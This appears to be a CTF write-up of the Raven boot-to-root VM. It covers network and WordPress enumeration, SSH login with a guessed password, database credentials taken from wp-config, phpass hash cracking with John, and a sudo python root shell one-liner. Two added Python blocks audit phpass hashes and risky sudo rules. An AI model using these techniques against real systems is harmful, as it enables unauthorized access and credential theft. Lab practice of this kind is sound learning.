Monday, October 4, 2021

CTF Raven VM



 

First I will run a ping scan of all the machines connected to this network segment.

└─$ nmap -sP 10.0.2.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-02 15:02 -05
Nmap scan report for 10.0.2.1
Host is up (0.0016s latency).
Nmap scan report for 10.0.2.11
Host is up (0.0010s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00056s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.59 seconds


Next, information is gathered about that target.

─$ sudo nmap -sV -O 10.0.2.11                                                                                                                                     
Starting Nmap ( https://nmap.org ) at 2021-08-02 15:05 -05
Nmap scan report for 10.0.2.11
Host is up (0.00056s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
MAC Address: **:**:**:**:**:** (***)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

Now the available paths are scanned, while taking a quick look at the service running on port 80. The scanner returned something similar to this.


└─$ dirb  http://10.0.2.11:80

-----------------
DIRB
By The Dark Raver
-----------------

START_TIME: Tue Aug  2 15:20:51 2021
URL_BASE: http://10.0.2.11:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                         

---- Scanning URL: http://10.0.2.11:80/ ----
==> DIRECTORY: http://10.0.2.11:80/css/                                                                                                                               
==> DIRECTORY: http://10.0.2.11:80/fonts/                                                                                                                             
==> DIRECTORY: http://10.0.2.11:80/img/                                                                                                                               
+ http://10.0.2.11:80/index.html (CODE:200|SIZE:16819)                                                                                                                
==> DIRECTORY: http://10.0.2.11:80/js/                                                                                                                                
==> DIRECTORY: http://10.0.2.11:80/manual/                                                                                                                            
+ http://10.0.2.11:80/server-status (CODE:403|SIZE:297)                                                                                                               
==> DIRECTORY: http://10.0.2.11:80/vendor/                                                                                                                            
==> DIRECTORY: http://10.0.2.11:80/wordpress/

...

 

Now that we know there is a WordPress-based blog, we can try scanning it with a tool called wpscan.

└─$ wpscan --url http://10.0.2.11:80/wordpress/ --wp-content-dir -ep -et -eu

...
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.0.2.11/wordpress/ [10.0.2.11]
[+] Started: Tue Aug 2 15:40:13 2021

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.0.2.11/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.0.2.11/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.0.2.11/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

...

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
...

 

Two users were found on the system; now I try to log in by brute force with possible passwords.

└─$ ssh michael@10.0.2.11
The authenticity of host '10.0.2.11 (10.0.2.11)' can't be established.
...
michael@10.0.2.11's password: michael

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$  


Now to explore. There is another user, steven. Looking through the files, nothing striking turned up at first glance, and checking the groups this user belonged to showed nothing very revealing.

michael@Raven:/etc$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Checking the network connections turned up this:

michael@Raven:/etc$ netstat -putana
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:44713 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 10.0.2.11:22 10.0.2.15:39360 ESTABLISHED -
tcp6 0 0 :::60971 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:52685 0.0.0.0:* -
udp 0 0 0.0.0.0:1000 0.0.0.0:* -
udp 0 0 127.0.0.1:1010 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:13162 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp6 0 0 :::1000 :::* -
udp6 0 0 :::48931 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::41844 :::* -

Port 3306 is MySQL, 22 is SSH, among others. Checking the services running on the machine:

michael@Raven:/etc$ systemctl status
● Raven
State: running
Jobs: 0 queued
Failed: 0 units
Since: Wed 2022-08-03 01:00:46 AEST; 2h 42min ago
CGroup: /
├─1 /sbin/init
└─system.slice
├─dbus.service
│ └─433 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
├─cron.service
│ └─425 /usr/sbin/cron -f
├─nfs-common.service
│ ├─410 /sbin/rpc.statd
│ └─424 /usr/sbin/rpc.idmapd
...
├─apache2.service
├─networking.service
│ └─378 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
...
├─mysql.service
│ ├─538 /bin/sh /usr/bin/mysqld_safe
│ └─932 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-
...
├─sendmail.service
│ └─574 sendmail: MTA: accepting connections 


Searching through the folders, I found a flag:

michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

I found that the mail service was sending emails. Now, going to the wordpress folder and examining the configuration, some clues turn up:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

 

With these, the database can be accessed from the console; the next step is to look up the users stored in WordPress.

michael@Raven:/var/www/html/wordpress$ mysql -u root -p
Enter password: R@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
...

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

Now to

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.03 sec)


mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
 

Saving steven's password hash to a file (we already have michael's password), John the Ripper will be used to crack that hash.

└─$ john user_hash

Created directory: /home/aka-linux/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
pink84 (?)
...
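John's "Cost 1 (iteration count) is 8192" line is read straight from the character after $P$ in the stored hash. The Python below is an added example (not from the original write-up and not WordPress's own code; the function names are this example's) that parses the portable phpass format of the wp_users rows above and recomputes a hash the way the scheme does, salted MD5 iterated 2^n times, so an administrator can audit which accounts still carry these cheap-to-guess hashes.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def parse_phpass(stored):
    """Split a portable phpass hash ($P$ or $H$) into its fields."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a portable phpass hash")
    log2 = ITOA64.find(stored[3])  # 4th character encodes log2(iterations)
    if not 7 <= log2 <= 30:
        raise ValueError("iteration exponent out of range")
    return {"iterations": 1 << log2, "salt": stored[4:12], "digest": stored[12:]}

def _encode64(data):
    """phpass base64 variant: little-endian 3-byte groups, 6 bits per character."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        out += [ITOA64[(value >> s) & 0x3F] for s in range(0, 6 * (len(chunk) + 1), 6)]
    return "".join(out)

def phpass_hash(password, stored):
    """Recompute the hash for `password` using the cost and salt inside `stored`."""
    fields = parse_phpass(stored)
    pw = password.encode("utf-8")
    digest = hashlib.md5(fields["salt"].encode("ascii") + pw).digest()
    for _ in range(fields["iterations"]):  # iterated, salted MD5: cheap per guess
        digest = hashlib.md5(digest + pw).digest()
    return stored[:12] + _encode64(digest)

def verify(password, stored):
    return hmac.compare_digest(phpass_hash(password, stored), stored)

def audit(rows):
    """rows: (user_login, user_pass) pairs -> {login: iterations} for phpass hashes."""
    report = {}
    for login, user_pass in rows:
        try:
            report[login] = parse_phpass(user_pass)["iterations"]
        except ValueError:
            continue  # some other hashing scheme; out of scope for this check
    return report

# The two wp_users rows shown on this page.
PAGE_ROWS = [("michael", "$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0"),
             ("steven", "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/")]
```

Running audit(PAGE_ROWS) shows both accounts at 8192 MD5 iterations, which gives little protection to a six-character password once the table has leaked.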

With the password, pink84, we switch to the user steven and check the groups he belongs to.

michael@Raven:/var/www/html/wordpress$ su steven
Password: pink84
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

sudo -l will list the commands allowed for the invoking user, in this case python, so a shell will be spawned with python.
$ su -l
Password:
su: Authentication failure
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
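
The rule above is the misconfiguration that decides this box: an interpreter allowed through sudo without a password. The following Python is an added example, not part of the original write-up, that audits sudo -l output for such rules; the list of shell-capable programs and the last sample line are assumptions constructed for this example.

```python
import re
from pathlib import PurePosixPath

# Programs that can execute arbitrary code or spawn a shell when run via sudo.
# Illustrative, non-exhaustive list chosen for this example (an assumption).
SHELL_CAPABLE = {"python", "python2", "python3", "perl", "ruby", "php", "lua",
                 "bash", "sh", "dash", "zsh", "vi", "vim", "less", "more",
                 "find", "awk", "env", "nmap", "tar"}

# Matches a rule line such as "(ALL) NOPASSWD: /usr/bin/python".
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_listing(text):
    """Return one finding per sudo rule that hands out a shell-capable program."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines, headers and blank lines are skipped
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        runas = {u.strip() for u in re.split(r"[,:]", m["runas"]) if u.strip()}
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0]
            if binary == "ALL" or PurePosixPath(binary).name in SHELL_CAPABLE:
                findings.append({
                    "command": binary,
                    "nopasswd": "NOPASSWD" in tags,
                    "as_root": bool(runas & {"ALL", "root"}),
                })
    return findings

# First five lines: the sudo -l output shown on this page.
# Last line: a constructed, harmless rule added for contrast.
SAMPLE = r"""Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
(root) /usr/sbin/service apache2 status
"""

if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE):
        print("RISKY:", finding)
```

Granting an interpreter through sudo is equivalent to granting a root shell; the fix is to remove the rule or replace it with a fixed-purpose command that takes no user-controlled arguments.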


$ sudo python -c "import pty; pty.spawn('/bin/bash')"
root@Raven:/var/www/html/wordpress# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www/html/wordpress#
root@Raven:~# cd
root@Raven:~# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|


flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io 

Many thanks to @mccannwj, who provided us with this VM. Until next time.

"I am a writer of books in retrospect. I talk in order to understand; I teach in order to learn." R.F